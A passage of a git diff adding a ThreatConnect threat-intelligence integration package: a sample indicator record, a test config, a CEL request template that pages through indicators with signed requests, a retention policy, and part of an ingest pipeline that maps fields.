"Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.", + "id": "3", + "name": "TLP:AMBER", + "owner": "System", + "source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ" + } + ] + }, + "sha1": "samplesha1", + "sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX", + "size": "123", + "source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX", + "subject": "Spam", + "summary": "johnbae@poverts.com", + "tags": { + "data": [ + { + "description": "ApplythisTagtoobjectsrelatedtoransomwareattacks", + "id": "1", + "last_used": "2023-08-25T13:15:30.000Z", + "name": "userexecution:maliciouslink", + "owner": "Demoorganization", + "platforms": { + "count": 1, + "data": [ + "Windows" + ] + }, + "technique": { + "id": "T1055.005" + } + } + ] + }, + "text": "http://www.testingmcafeesites.com/tes_pc.html", + "threat_assess": { + "confidence": 61.0, + "rating": 3.0, + "score": { + "false_positive": 0, + "observed": 0, + "value": 382 + } + }, + "tracked_users": { + "data": [ + { + "id": 1234557 + } + ] + }, + "type": "EmailAddress", + "user_agent_string": "PostmanRuntime/7.32.3", + "value": { + "name": "0", + "type": "REG_QWORD" + }, + "web_link": "https://partnerstage-intel.threatconnect.com/", + "who_is": { + "data": [ + { + "id": 1234558 + } + ] + }, + "whois_active": true + } + }, + "user": { + "domain": "xyz.com", + "email": "hohnabc@xyz.com", + "name": "hohnabc" + }, + "user_agent": { + "original": "PostmanRuntime/7.32.3" + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml b/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..7c50d5d0e73 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/system/test-default-config.yml @@ -0,0 +1,13 @@ +input: cel +service: threatconnect-indicator +vars: + url: http://{{Hostname}}:{{Port}} + access_id: "1234" + secret_key: xxxx +data_stream: + vars: + interval: 5m + batch_size: 2 + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs b/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..25b3190b3ed --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/agent/stream/cel.yml.hbs @@ -0,0 +1,198 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ioc_expiration_duration}} +fields_under_root: true +fields: + _conf: + ioc_expiration_duration: "{{ioc_expiration_duration}}" +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + access_id: {{escape_string access_id}} + secret_key: {{escape_string secret_key}} + counter: 0 + want_more: false + batch: {{batch_size}} + initial_interval: {{initial_interval}} + event_list: + - associatedGroups + - associatedIndicators + - attributes + - securityLabels + - sightings + - tags + - threatAssess + tql_filter: {{tql}} +redact: + fields: + - secret_key +program: | + request("GET", ( + !state.want_more ? + state.url + "/api/v3/indicators?" + { + "fields": state.event_list, + "resultStart": ["0"], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? + (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + : + state.next_url + ) + ) + .with({ + "Header": { + "Authorization": ["TC "+ string(state.access_id) + ":" + + base64( + bytes( + ( + has(state.next_url) && state.next_url.contains_substr("/api") ? + "/api" + state.next_url.split("/api")[1] + : + "/api/v3/indicators?" + + { + "fields": state.event_list, + "resultStart": ["0"], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? + (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + ) + + ":GET:" + string(int(now)) + ).hmac("sha256", bytes(state.secret_key))) + ], + "Timestamp": [string(int(now))] + } + }) + .do_request() + .as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body.data.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "counter": has(body.next) && body.next != null && body.next != "" ? int(state.counter) + int(state.batch) : 0, + "access_id": state.access_id, + "secret_key": state.secret_key, + "want_more": has(body.next) && body.next != null && body.next != "", + "batch": state.batch, + "initial_interval": state.initial_interval, + "event_list": has(state.event_list) && state.event_list != null && state.event_list != "" ? state.event_list : null, + "tql_filter": has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? state.tql_filter : null, + "next_url": ( + has(body.next) && body.next != null && body.next != "" ? + state.url + "/api/v3/indicators?" + + { + "fields": state.event_list, + "resultStart": [string(int(state.counter) + body.data.size())], + "resultLimit": [string(state.batch)], + "sorting": ["lastModified asc"], + "tql": ['lastModified GEQ "'+( + !state.want_more ? + (has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + : + (has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + : + "" + ) + )+'"'+( + has(state.tql_filter) && state.tql_filter != null && state.tql_filter != "" ? + " AND "+state.tql_filter.trim(" ") + : + "" + ) + ], + }.format_query() + : + state.url + ), + "cursor": { + "last_timestamp": ( + has(body.data) && body.data.size() > 0 ? + string((body.data.map(e, e.lastModified).max()).parse_time(time_layout.RFC3339) + duration("1s")).split("+")[0] + : + has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && has(body.data) && state.cursor.first_timestamp != null ? + (has(body.next) && body.next != null && body.next != "" ? + state.cursor.first_timestamp + : + state.cursor.last_timestamp) + : + string((now - duration(state.initial_interval)).format(time_layout.RFC3339)).split("+")[0] + ) + } + })) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..eb4f660adf4 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "hot": { + "actions": { + "rollover": { + "max_age": "1d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + }, + "delete": { + "min_age": "2d", + "actions": { + "delete": {} + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..bbb271b23cc --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,2246 @@ +--- +description: Pipeline for processing indicator logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: enrichment + - append: + field: event.category + tag: append_threat_into_event_category + value: threat + allow_duplicates: false + - append: + field: event.type + tag: append_indicator_into_event_type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + tag: set_threat_indicator_provider + value: ThreatConnect + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fingerprint: + fields: + - json.summary + - json.lastModified + target_field: _id + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + lang: painless + tag: script-default-deleted_at + if: ctx.json?.deleted_at == null && ctx.json?.lastModified != null && ctx._conf?.ioc_expiration_duration != null && ctx._conf.ioc_expiration_duration != '' + description: Add default deleted_at field. + source: > + def dur = ctx._conf.ioc_expiration_duration; + String lastModified = ctx.json.lastModified; + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusMinutes(Long.parseLong(time_value)); + } else { + ctx.json.deleted_at = ZonedDateTime.parse(lastModified).plusDays(90L); + } + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.deleted_at + tag: date_deleted_at + target_field: threat_connect.indicator.deleted_at + formats: + - ISO8601 + - UNIX + if: ctx.json?.deleted_at != null && ctx.json.deleted_at != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: threat_connect.indicator.expiration_duration + ignore_missing: true + - convert: + field: json.activeLocked + tag: convert_activeLocked_to_boolean + target_field: threat_connect.indicator.active.locked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.active + tag: convert_active_to_boolean + target_field: threat_connect.indicator.active.value + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.address + tag: rename_address + target_field: threat_connect.indicator.address + ignore_missing: true + - dissect: + if: ctx.threat_connect?.indicator?.address != null && ctx.threat_connect.indicator.address.contains('@') + tag: dissect_threat_connect_indicator_address + field: threat_connect.indicator.address + pattern: '%{user.name}@%{user.domain}' + - append: + field: related.user + tag: append_user_name_into_related_user + value: "{{{user.name}}}" + allow_duplicates: false + if: ctx.user?.name != null + - set: + field: threat.indicator.email.address + tag: set_threat_indicator_email_address_from_indicator_address + copy_from: threat_connect.indicator.address + ignore_empty_value: true + - set: + field: user.email + tag: set_user_email_from_indicator_address + copy_from: threat_connect.indicator.address + ignore_empty_value: true + - rename: + field: json.AS Number + tag: rename_AS Number + target_field: threat_connect.indicator.as_number + ignore_missing: true + - gsub: + field: threat_connect.indicator.as_number + tag: replace_string_values_with_space + target_field: threat_connect.indicator.temp + pattern: '[a-zA-Z]' + replacement: ' ' + ignore_missing: true + - trim: + field: threat_connect.indicator.temp + tag: trim_white_spaces_from_string + ignore_missing: true + ignore_failure: true + - convert: + field: threat_connect.indicator.temp + tag: convert_as_number_string_to_long + target_field: threat.indicator.as.number + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: threat_connect.indicator.temp + ignore_missing: true + - rename: + field: json.associatedArtifacts + tag: rename_associatedArtifacts + target_field: threat_connect.indicator.associated_artifacts + ignore_missing: true + - rename: + field: json.associatedCases + tag: rename_associatedCases + target_field: threat_connect.indicator.associated_cases + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_firstname + processor: + rename: + field: _ingest._value.createdBy.firstName + tag: rename_associatedGroups_data_createdBy_firstName + target_field: _ingest._value.created_by.first_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_groups_data_created_by_firstname_append_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_firstName_into_related_user + value: '{{{_ingest._value.created_by.first_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_convert_createdby_id + processor: + convert: + field: _ingest._value.createdBy.id + tag: convert_associatedGroups_data_createdBy_id_to_string + target_field: _ingest._value.created_by.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.createdBy.id + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_convert_assignments_data_id + processor: + foreach: + field: _ingest._value.assignments.data + ignore_missing: true + tag: foreach_assignments_data + processor: + convert: + field: _ingest._value.user.id + tag: convert_associatedGroups_data_assignments_data_user_id_to_string + target_field: _ingest._value.user.id + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_assignments_data_type + processor: + rename: + field: _ingest._value.assignments.data.type + tag: rename_associatedGroups_data_assignments_data_type + target_field: _ingest._value.assignments.data.type + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_createdby_lastname + processor: + rename: + field: _ingest._value.createdBy.lastName + tag: rename_associatedGroups_data_createdBy_lastName + target_field: _ingest._value.created_by.last_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associatedGroups_data_last_name_append_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_lastName_into_related_user + value: '{{{_ingest._value.created_by.last_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_createdby_owner + processor: + rename: + field: _ingest._value.createdBy.owner + tag: rename_associatedGroups_data_createdBy_owner + target_field: _ingest._value.created_by.owner + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_associated_data_rename_createdBy_pseudonym + processor: + rename: + field: _ingest._value.createdBy.pseudonym + tag: rename_associatedGroups_data_createdBy_pseudonym + target_field: _ingest._value.created_by.pseudonym + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_createdBy_userName + processor: + rename: + field: _ingest._value.createdBy.userName + tag: rename_associatedGroups_data_createdBy_userName + target_field: _ingest._value.created_by.user_name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_createdBy_userName_into_related_user + processor: + append: + field: related.user + tag: append_associatedGroups_data_createdBy_userName_into_related_user + value: '{{{_ingest._value.created_by.user_name}}}' + allow_duplicates: false + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_to_email + processor: + append: + field: email.to.address + tag: append_associatedGroups_data_to_email + value: '{{{_ingest._value.to}}}' + allow_duplicates: false + ignore_failure: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_append_associatedGroups_data_from_email + processor: + append: + field: email.from.address + tag: append_associatedGroups_data_from_email + value: '{{{_ingest._value.from}}}' + allow_duplicates: false + ignore_failure: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_associatedGroups_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_documentDateAdded + processor: + date: + field: _ingest._value.documentDateAdded + tag: date_associatedGroups_data_documentDateAdded + target_field: _ingest._value.document.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.documentDateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_documentType + processor: + rename: + field: _ingest._value.documentType + tag: rename_associatedGroups_data_documentType + target_field: _ingest._value.document.type + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_downVoteCount + processor: + rename: + field: _ingest._value.downVoteCount + tag: rename_associatedGroups_data_downVoteCount + target_field: _ingest._value.down_vote_count + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_dueDate + processor: + date: + field: _ingest._value.dueDate + tag: date_associatedGroups_data_dueDate + target_field: _ingest._value.due_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dueDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_emailDate + processor: + date: + field: _ingest._value.emailDate + tag: date_associatedGroups_data_emailDate + target_field: _ingest._value.email_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.emailDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_escalationDate + processor: + date: + field: _ingest._value.escalationDate + tag: date_associatedGroups_data_escalationDate + target_field: _ingest._value.escalation_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.escalationDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_eventDate + processor: + date: + field: _ingest._value.eventDate + tag: date_associatedGroups_data_eventDate + target_field: _ingest._value.event_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.eventDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalDateAdded + processor: + date: + field: _ingest._value.externalDateAdded + tag: date_associatedGroups_data_externalDateAdded + target_field: _ingest._value.external.date.added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateAdded + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalDateExpires + processor: + date: + field: _ingest._value.externalDateExpires + tag: date_associatedGroups_data_externalDateExpires + target_field: _ingest._value.external.date.expires + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateExpires + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_externalLastModified + processor: + date: + field: _ingest._value.externalLastModified + tag: date_associatedGroups_data_externalLastModified + target_field: _ingest._value.external.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalLastModified + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileName + processor: + rename: + field: _ingest._value.fileName + tag: rename_associatedGroups_data_fileName + target_field: _ingest._value.file.name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + processor: + convert: + field: _ingest._value.fileSize + tag: convert_associatedGroups_data_filesize_to_string + target_field: _ingest._value.file.size + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.fileSize + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileText + processor: + rename: + field: _ingest._value.fileText + tag: rename_associatedGroups_data_fileText + target_field: _ingest._value.file.text + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_fileType + processor: + rename: + field: _ingest._value.fileType + tag: rename_associatedGroups_data_fileType + target_field: _ingest._value.file.type + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_firstSeen + processor: + date: + field: _ingest._value.firstSeen + tag: date_associatedGroups_data_firstSeen + target_field: _ingest._value.first_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.firstSeen + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_generatedReport_to_boolean + processor: + convert: + field: _ingest._value.generatedReport + tag: convert_associatedGroups_data_generatedReport_to_boolean + target_field: _ingest._value.generated_report + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.generatedReport + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_lastModified + processor: + date: + field: _ingest._value.lastModified + tag: date_associatedGroups_data_lastModified + target_field: _ingest._value.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastModified + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_lastSeen + processor: + date: + field: _ingest._value.lastSeen + tag: date_associatedGroups_data_lastSeen + target_field: _ingest._value.last_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastSeen + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_legacyLink + processor: + rename: + field: _ingest._value.legacyLink + tag: rename_associatedGroups_data_legacyLink + target_field: _ingest._value.legacy_link + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_malware_to_boolean + processor: + convert: + field: _ingest._value.malware + tag: convert_associatedGroups_data_malware_to_boolean + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.malware + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_ownerId_to_string + processor: + convert: + field: _ingest._value.ownerId + tag: convert_associatedGroups_data_ownerId_to_string + target_field: _ingest._value.owner.id + type: string + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_ownerName + processor: + rename: + field: _ingest._value.ownerName + tag: rename_associatedGroups_data_ownerName + target_field: _ingest._value.owner.name + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_publishDate + processor: + date: + field: _ingest._value.publishDate + tag: date_associatedGroups_data_publishDate + target_field: _ingest._value.publish_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.publishDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_date_associatedGroups_data_reminderDate + processor: + date: + field: _ingest._value.reminderDate + tag: date_associatedGroups_data_reminderDate + target_field: _ingest._value.reminder_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.reminderDate + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_scoreBreakdown + processor: + rename: + field: _ingest._value.scoreBreakdown + tag: rename_associatedGroups_data_scoreBreakdown + target_field: _ingest._value.score_breakdown + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_scoreIncludesBody_to_boolean + processor: + convert: + field: _ingest._value.scoreIncludesBody + tag: convert_associatedGroups_data_scoreIncludesBody_to_boolean + target_field: _ingest._value.score_includes_body + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.scoreIncludesBody + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_upVote_to_boolean + processor: + convert: + field: _ingest._value.upVote + tag: convert_associatedGroups_data_upVote_to_boolean + target_field: _ingest._value.up_vote + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.upVote + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_upVoteCount + processor: + rename: + field: _ingest._value.upVoteCount + tag: rename_associatedGroups_data_upVoteCount + target_field: _ingest._value.up_vote_count + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_rename_associatedGroups_data_webLink + processor: + rename: + field: _ingest._value.webLink + tag: rename_associatedGroups_data_webLink + target_field: _ingest._value.web_link + ignore_missing: true + - foreach: + field: json.associatedGroups.data + if: ctx.json?.associatedGroups?.data != null + tag: foreach_convert_associatedGroups_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_associatedGroups_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.upVote + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.associatedGroups.data + tag: rename_associatedGroups_data + target_field: threat_connect.indicator.associated_groups.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_groups.data + if: ctx.threat_connect?.indicator?.associated_groups?.data != null + tag: foreach_remove_duplicate_fields + processor: + remove: + field: + - _ingest._value.createdBy.firstName + - _ingest._value.createdBy.lastName + - _ingest._value.createdBy.id + - _ingest._value.dueDate + - _ingest._value.downVoteCount + - _ingest._value.documentType + - _ingest._value.externalDateAdded + - _ingest._value.externalDateExpires + - _ingest._value.externalLastModified + - _ingest._value.fileName + - _ingest._value.fileText + - _ingest._value.fileSize + - _ingest._value.fileType + - _ingest._value.eventDate + - _ingest._value.escalationDate + - _ingest._value.emailDate + - _ingest._value.firstSeen + - _ingest._value.lastSeen + - _ingest._value.lastModified + - _ingest._value.documentDateAdded + - _ingest._value.dateAdded 